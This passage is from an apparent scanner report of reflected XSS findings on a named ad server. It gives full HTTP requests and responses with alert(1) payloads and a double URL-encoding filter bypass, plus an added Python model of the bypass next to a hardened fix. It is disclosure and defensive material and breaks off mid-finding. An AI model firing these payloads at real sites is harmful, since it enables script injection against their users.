This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the server decodes %253c to %3c, and the application decodes it a second time to < before building the response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574fb39%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5659937c937/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2894

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
97,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313574fb39"><script>alert(1)</script>5659937c937/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b78af%2522%253balert%25281%2529%252f%252fa676bdeebed was submitted in the REST URL parameter 2. This input was echoed as b78af";alert(1)//a676bdeebed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Caveat: the response excerpt below shows the decoded value inside the single-quoted literal ('//ad.wsod.com/embed/...') that builds <scr'+'ipt ... src="..."> markup, so the "; intended to terminate a double-quoted string only closes the src attribute of the written tag. Confirm in a browser; finding 1.56 (same path segment, plain <a href="..."> attribute) is the reliable proof of concept. The double-decoding bypass itself is established either way, since %2522 arrives as " in the response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357b78af%2522%253balert%25281%2529%252f%252fa676bdeebed/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2849

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357b78af";alert(1)//a676bdeebed/1456.0.iframe.150x50/1300909524**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,270
...[SNIP]...

1.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24735%2522%253balert%25281%2529%252f%252ff66512879be was submitted in the REST URL parameter 3. This input was echoed as 24735";alert(1)//f66512879be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Caveat: as the excerpt below shows, the decoded value lands inside the single-quoted literal that builds <scr'+'ipt ... src="..."> markup, where the "; closes the src attribute of the written tag rather than a double-quoted JavaScript string. Confirm in a browser; finding 1.59 (same path segment, plain <a href="..."> attribute) is the reliable proof of concept. The double-decoding bypass is established either way, since %2522 arrives as " in the response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x5024735%2522%253balert%25281%2529%252f%252ff66512879be/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2849

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x5024735";alert(1)//f66512879be/1300909666**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298
...[SNIP]...

1.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed64%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf7cdda46ab was submitted in the REST URL parameter 3. This input was echoed as bed64"><script>alert(1)</script>df7cdda46ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50bed64%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf7cdda46ab/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2894

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50bed64"><script>alert(1)</script>df7cdda46ab/" target="_blank" border="0" style="border:0px;">
...[SNIP]...
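The double URL-encoding bypass reported in findings 1.56 to 1.59 can be modelled end to end, together with the fix. The following Python is an added example, not code from the report or from the ad.wsod.com application. The server logic it assumes is inferred from the report rather than observed: one decode performed by the runtime before the application runs, a character blocklist applied to that once-decoded value, and a second decode by the application before the value is spliced into an <a href="..."> attribute. The ad identifier format, the helper names and the sample inputs are constructed for illustration. The hardened path decodes exactly once, validates against an allowlist, and encodes for the output context; the two encoder helpers cover the attribute context and the JavaScript-string context that the findings on this page fall into.

```python
"""
Added example (not from the XSS.CX report or the ad.wsod.com application):
a model of the double-URL-encoding filter bypass in findings 1.56-1.59 next
to a hardened rendering path.

Assumptions, because the report shows no server code:
  * the runtime decodes the path segment once before the application sees it;
  * the application applies a character blocklist to that value and later
    decodes it a second time before building an <a href="..."> tag.
"""
import json
import re
from html import escape
from urllib.parse import unquote

BLOCKED_CHARS = set('<>"\'')
SAFE_ID = re.compile(r'[A-Za-z0-9._,-]+')   # assumed shape of an ad/creative id


def runtime_decode(raw_path_segment: str) -> str:
    """First decode, done by the server before the application runs (assumption)."""
    return unquote(raw_path_segment)


def vulnerable_render(raw_path_segment: str):
    """Blocklist on the once-decoded value, then a second decode: the bypass."""
    once = runtime_decode(raw_path_segment)
    if any(c in BLOCKED_CHARS for c in once):
        return None                        # request rejected by the filter
    twice = unquote(once)                  # second decode reintroduces < > "
    return f'<a href="http://ad.wsod.com/click/{twice}/" target="_blank">'


def hardened_render(raw_path_segment: str):
    """Decode exactly once, allowlist-validate, then encode for the output context."""
    value = runtime_decode(raw_path_segment)
    if not SAFE_ID.fullmatch(value):
        return None                        # anything that is not an id is rejected
    # HTML attribute context: entity-encode " < > & so the attribute cannot close early.
    return f'<a href="http://ad.wsod.com/click/{escape(value, quote=True)}/" target="_blank">'


def html_attr_literal(value: str) -> str:
    """Encode a value for a double-quoted HTML attribute."""
    return escape(value, quote=True)


def js_string_literal(value: str) -> str:
    """Encode a value as a double-quoted JavaScript string literal for an inline
    <script>. json.dumps handles quotes and backslashes; < and > are escaped too
    so that neither </script> nor a quote can end the element or the string."""
    return json.dumps(value).replace('<', '\\u003c').replace('>', '\\u003e')


# Constructed inputs modelled on the report's REST URL parameter 2 probes.
PLAIN_PROBE = '4fb39"><script>alert(1)</script>5659937c937'
SINGLE_ENCODED = '4fb39%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5659937c937'
DOUBLE_ENCODED = '4fb39%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5659937c937'
LEGIT_ID = '8bec9b10877d5d7fd7c0fb6e6a631357'


def demo() -> dict:
    """Summarise the behaviour of both paths on the constructed inputs."""
    return {
        'single_encoded_blocked': vulnerable_render(SINGLE_ENCODED) is None,
        'double_encoded_bypasses': PLAIN_PROBE in (vulnerable_render(DOUBLE_ENCODED) or ''),
        'hardened_rejects_probe': hardened_render(DOUBLE_ENCODED) is None,
        'hardened_accepts_id': hardened_render(LEGIT_ID),
        'attr_encoded_probe': html_attr_literal(PLAIN_PROBE),
        'js_encoded_probe': js_string_literal('e4d00"-alert(1)-"e72bcd1c54a'),
    }


if __name__ == '__main__':
    for key, result in demo().items():
        print(f'{key}: {result}')
```

The single-encoded probe is rejected because the filter sees the quote; the double-encoded probe passes the filter and reappears verbatim after the second decode, which is exactly the behaviour the four findings describe. The hardened path never needs to know about encoding tricks: decoding once at the boundary removes the second-decode step that created the gap, and context-aware output encoding protects the attribute even if validation were relaxed.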

1.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81927"-alert(1)-"b11af9703e8 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

Caveat: the excerpt below shows the reflected value terminated by ">, that is, inside an HTML attribute value, where "-alert(1)-" produces a stray attribute rather than script execution; the double-quoted JavaScript string this classification assumes is not visible in the excerpt. Treat finding 1.61 (same parameter, "><script> payload) as the reliable proof of concept for Redirect.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=81927"-alert(1)-"b11af9703e8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=81927"-alert(1)-"b11af9703e8">
...[SNIP]...

1.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fda"><script>alert(1)</script>8661b5b0538 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=27fda"><script>alert(1)</script>8661b5b0538 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=27fda"><script>alert(1)</script>8661b5b0538http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8cfe"-alert(1)-"a49fee813c9 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

Caveat: the excerpt below shows the reflected value followed by &Values=1589&Redirect=">, that is, inside an HTML attribute value, where "-alert(1)-" yields a stray attribute and no script execution; no double-quoted JavaScript string is visible in the excerpt. Treat finding 1.63 (same parameter, "><script> payload) as the reliable proof of concept for Segments.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805b8cfe"-alert(1)-"a49fee813c9&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805b8cfe"-alert(1)-"a49fee813c9&Values=1589&Redirect=">
...[SNIP]...

1.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the Segments request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 414d0"><script>alert(1)</script>e397680c65 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805414d0"><script>alert(1)</script>e397680c65&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2849

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805414d0"><script>alert(1)</script>e397680c65&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcb93"-alert(1)-"6cd1cf6a25f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

